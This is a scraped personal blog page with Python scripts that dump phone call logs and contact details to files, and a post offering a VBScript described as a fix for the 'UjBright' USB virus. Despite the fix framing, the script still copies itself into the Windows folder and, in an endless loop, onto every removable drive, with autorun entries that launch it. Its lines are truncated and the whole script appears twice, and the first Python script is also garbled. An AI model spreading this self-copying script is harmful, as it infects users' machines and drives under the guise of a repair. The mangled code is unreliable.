import logs, os, codecs import appuifw import time import contacts ep='e:\calllogs\' rt=time.time() # for countries east of GMT i.e. GMT+xy hrs rt=rt+str(-(time.timezone)) # being in india i use GMT+(-19800) #rt = rt + 19800 rt=time.gmtime(rt) #Dr.MiT, Hyderabad, INDIA tp=str(rt[0])+'_'+str(rt[1])+'_'+str(rt[2])+'_'+str(rt[3])+'_'+str(rt[4])+'_'+str(rt[5])+'_calllog.txt' #tp=str(rt[0])+'_'+str(rt[1])+'_'+str(tr[2])+'_'+str(rt[3])+'_'+ #str(rt[4])+'_'+str(rt[5])+'_calllog.txt' #if this line extends beyond ur display, press "'ctrl'+'-'" to decrease the size #(ctrl)+(+) to increase the webpage display size #(ctrl)+(-) to decrease the webpage display size fn=ep+tp nl='\n' ts=time.asctime() ttza=time.timezone sttza=str(ttza) ttzb=ttza+39600 sttzb=str(ttzb),'w','utf8') sf.write(nl+'ttza=time.timezone is '+ttza+nl) sf.write(nl+'ttzb=ttza+39600 is '+sttzb+nl) sf.write(nl+'Today is '+str(ts)+nl) e=['out','missed','in'] for x in e: l=logs.calls(mode=x) for i in range(len(l)): dim=ttzb+(l[i]["time"]) dim=time.localtime(dim) # lm=time.timezone() # dim=dim+(time.timezone) dateim= time.strftime("%Y/%m/%d-%H:%M:%S", dim) daasc= time.asctime(dim) s=str(dateim)+" "+str(daasc)+(" M:")+str(l[i]["direction"]) s=s+(" D:")+str(l[i]["duration"]) s=s+(" N:")+str(l[i]["number"]) nln=" ;" s=s+nln sf.write( str(s)+'\n') cn=co.find(l[i]["number"]) leco=len(cn) if leco > 1: s1=str("There are multiple contacts entered for the number") s2=str(cn) s3=s1+s2 sf.write(str(s3)+':') sf.write((l[i]["number"])+'\n') for h in range(len(cn)): q=str(h) y=str("Contact No:")+q c=cn[h] ct=c.title sf.write( y+'\n'+"Title is "+ str(ct)+'\n') # c=cn[h] for j in range(len(c)): t=c[j].type v=c[j].value lon=c[j].location lal=c[j].label tv="label is "+lal+", "+t+" : "+v+" , "+"location:h/w/o-"+lon sf.write( str(tv)+'\n') elif leco < 1: tv=str("UNKNOWN Number:")+str(l[i]["number"]) sf.write( str(tv)+'\n') elif leco ==1: dn=str(cn) # ct=cn.title # sf.write( "Title is "+ str(ct)+'\n'+cn+'\n') sf.write(dn+'\n') for h in range(len(cn)): c=cn[h] for k in range(len(c)): t=c[k].type v=c[k].value lon=c[k].location lal=c[k].label tv="label is "+lal+", "+t+" : "+v+" , "+"location:h/w/o-"+lon sf.write( str(tv)+'\n') # sf.write( str(s)+'\n') sf.close() #contacts.close() module obj has no attribute close #appuifw.note("log Written. ",'info') # #Dr.MiT, Hyderabad, INDIA appuifw.note("log Written to"+fn+"\n"+",",'info') # #The advantage is that each time log is saved with the current time as filename #so no need to manually backup the file in fear of being overwritten #as when using a specific (constant/same) filename everytime, #or a loooooong file if 'append' (a) is used instead of 'write' (w). # #Dr.MiT, Hyderabad, India
Friday, May 21, 2010
Saving call logs
Sunday, November 8, 2009
UjBright Virus
The file UjBright_Antivirus.vbs infects the systems and changes Explorer>Menu>Tools>Folder options> and changes the file attributes to NOT show hidden files, It also disables registry editing, so that we cannot disable the virus from being active.
I changed the file Uj UjBright_Antivirus.vbs;
I changed the registry enteries to enable whatever this file was disabling and i added for it to end the viral script.
This file u copy to /systemroot/windows/ folder. It will run once and then stop. No infections alas it clears the changes made by the virus.
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax
Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")
win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)
If Mid(x, 4) = "UjBright_Antivirus_vbs.txt" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
ax = fso.FileExists(win & "\UjBright_Antivirus_vbs.txt")
Set myFile = fso.CreateTextFile(win &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
Set fAttr = fso.Getfile(win & "\UjBright_Antivirus_vbs.txt")
autoMe", " """ & win & "\UjBright_Antivirus_vbs.txt"""
If ax = false Then wscr.Run "wscript.exe """ & win &
While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:"
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf")
Set fAttr = fso.Getfile(myFlashDrive.Path &
fso.Deletefile myFlashDrive.Path & "\Autorun_inf.txt",
End If
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\Autorun_inf.txt", true)
auFile.write "[autorun]" & vbCrLf & "open=\" & vbCrLf &
"open=wscript.exe UjBright_Antivirus_vbs.txt" & vbCrLf &
"shell\Open\Command=wscript.exe UjBright_Antivirus_vbs.txt" &
vbCrLf & "shell\Open\Default=1"
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\README_MIT_.txt", true)
auFile.write "Hello FRIENDS:" & vbCrLf & "" & vbCrLf & ""
& vbCrLf & "" & vbCrLf & " " & vbCrLf & "modified to negate virus
infection by DR.MHMD IMRAN T., +919441119044 Hyderabad, India" &
vbCrLf & "He wrote the virus >>> JUST CONTACT ME: 09083223171 -
Set fAttr = fso.Getfile(myFlashDrive.Path &
Set myFile = fso.CreateTextFile(myFlashDrive.Path &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
Set fAttr = fso.Getfile(myFlashDrive.Path &
End If
With wscr
autoMe", " """ & win & "\UjBright_Antivirus.txt"""
rer\Advanced\Hidden", 0, "REG_DWORD"
rer\Advanced\HideFileExt", 0, "REG_DWORD"
rer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
ies\Explorer\NoFolderOptions", 0, "REG_DWORD"
ies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
ies\System\DisableRegistryTools", 0, "REG_DWORD"
ies\System\DisableTaskMgr", 0, "REG_DWORD"
End With
If tf <> win & "\UjBright_Antivirus.txt" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If
WScript.Sleep 10000
I changed the file Uj UjBright_Antivirus.vbs;
I changed the registry enteries to enable whatever this file was disabling and i added for it to end the viral script.
This file u copy to /systemroot/windows/ folder. It will run once and then stop. No infections alas it clears the changes made by the virus.
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax
Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")
win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)
If Mid(x, 4) = "UjBright_Antivirus_vbs.txt" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
ax = fso.FileExists(win & "\UjBright_Antivirus_vbs.txt")
Set myFile = fso.CreateTextFile(win &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
Set fAttr = fso.Getfile(win & "\UjBright_Antivirus_vbs.txt")
autoMe", " """ & win & "\UjBright_Antivirus_vbs.txt"""
If ax = false Then wscr.Run "wscript.exe """ & win &
While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:"
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf")
Set fAttr = fso.Getfile(myFlashDrive.Path &
fso.Deletefile myFlashDrive.Path & "\Autorun_inf.txt",
End If
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\Autorun_inf.txt", true)
auFile.write "[autorun]" & vbCrLf & "open=\" & vbCrLf &
"open=wscript.exe UjBright_Antivirus_vbs.txt" & vbCrLf &
"shell\Open\Command=wscript.exe UjBright_Antivirus_vbs.txt" &
vbCrLf & "shell\Open\Default=1"
Set auFile = fso.CreateTextFile(myFlashDrive.Path &
"\README_MIT_.txt", true)
auFile.write "Hello FRIENDS:" & vbCrLf & "" & vbCrLf & ""
& vbCrLf & "" & vbCrLf & " " & vbCrLf & "modified to negate virus
infection by DR.MHMD IMRAN T., +919441119044 Hyderabad, India" &
vbCrLf & "He wrote the virus >>> JUST CONTACT ME: 09083223171 -
Set fAttr = fso.Getfile(myFlashDrive.Path &
Set myFile = fso.CreateTextFile(myFlashDrive.Path &
"\UjBright_Antivirus_vbs.txt", true)
myFile.write scrText
Set fAttr = fso.Getfile(myFlashDrive.Path &
End If
With wscr
autoMe", " """ & win & "\UjBright_Antivirus.txt"""
rer\Advanced\Hidden", 0, "REG_DWORD"
rer\Advanced\HideFileExt", 0, "REG_DWORD"
rer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
ies\Explorer\NoFolderOptions", 0, "REG_DWORD"
ies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
ies\System\DisableRegistryTools", 0, "REG_DWORD"
ies\System\DisableTaskMgr", 0, "REG_DWORD"
End With
If tf <> win & "\UjBright_Antivirus.txt" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If
WScript.Sleep 10000
Wednesday, November 4, 2009
Save CallLogs using python
from __future__ import division import logs import appuifw import e32 import time fn=u"E:\\system\\Apps\\Python\\logs\\logs.txt" logfile = open(fn,"a") e=['out', 'missed', 'in'] for x in e: l=logs.calls(mode=x) for i in range(len(l)): dim=time.localtime(l[i]["time"]) dateim= time.strftime("%Y/%m/%d-%H:%M:%S", dim) s=str(dateim)+(" M:")+str(l[i]["direction"]) s=s+(" D:")+str(l[i]["duration"]) s=s+(" N:")+str(l[i]["number"]) nln=" ;" s=s+nln logfile.write( str(s)+'\n') logfile.close() # appuifw.note(u"log Written.,",'info')
Output:- 2009/mo/da-hh:mm:ss M:Outgoing N:1234567890 ; 2009/mo/da-hh:mm:ss M:Missed call N:1234567890 ; 2009/mo/da-hh:mm:ss M:Incoming N:1234567890 ; ---------------------------------------------------- comments:- from __future__ import division import logs import appuifw import e32 import time # declare a filesystem object # u for UNICODE format of file # r for windows format of file # for binary fn=u"E:\\system\\Apps\\Python\\logs\\logs.txt" # open file of the FSO # r to read # w to write # a to append logfile = open(fn,"a") # declare a tuple containing three parameters / mode-variables e=['out', 'missed', 'in'] # loop through for each mode as outgoing, missed and incoming calls # x changes to out, missed and in cyclically as declared in e # for x in e: is executed thrice for x in e: # declare log of calls with each mode cyclically starting with outgoing l=logs.calls(mode=x) #for each of the three modes loop till the mode(e.g. outgoing) list ends for i in range(len(l)): # for each entry in log, convert the time in seconds since 1970(UTC) to localtime dim=time.localtime(l[i]["time"]) # convert the dim tuple to standard format with strftime dateim= time.strftime("%Y/%m/%d-%H:%M:%S", dim) # store the formatted localtime to a string s, add alphabet M and add direction # of call as outgoing/missed/incoming # otherwise we can use the value of x as declared in for x in e: s=str(dateim)+(" M:")+str(l[i]["direction"]) # the duration of the call s=s+(" D:")+str(l[i]["duration"]) # the number called (second party) preceeded by Alph N: s=s+(" N:")+str(l[i]["number"]) # a semicolon so that you can parse the final file to a database nln=" ;" # finalize the value of string s s=s+nln # write string s to the file along with a newline logfile.write( str(s)+'\n') # for the first run the loop 'for x in e:' ends and begins with next value of x # 'for x in e:' ends with three runs # close the file logfile.close() # # flash a 'info' note on the screen, UNICODE 'u' appuifw.note(u"log Written.,",'info')
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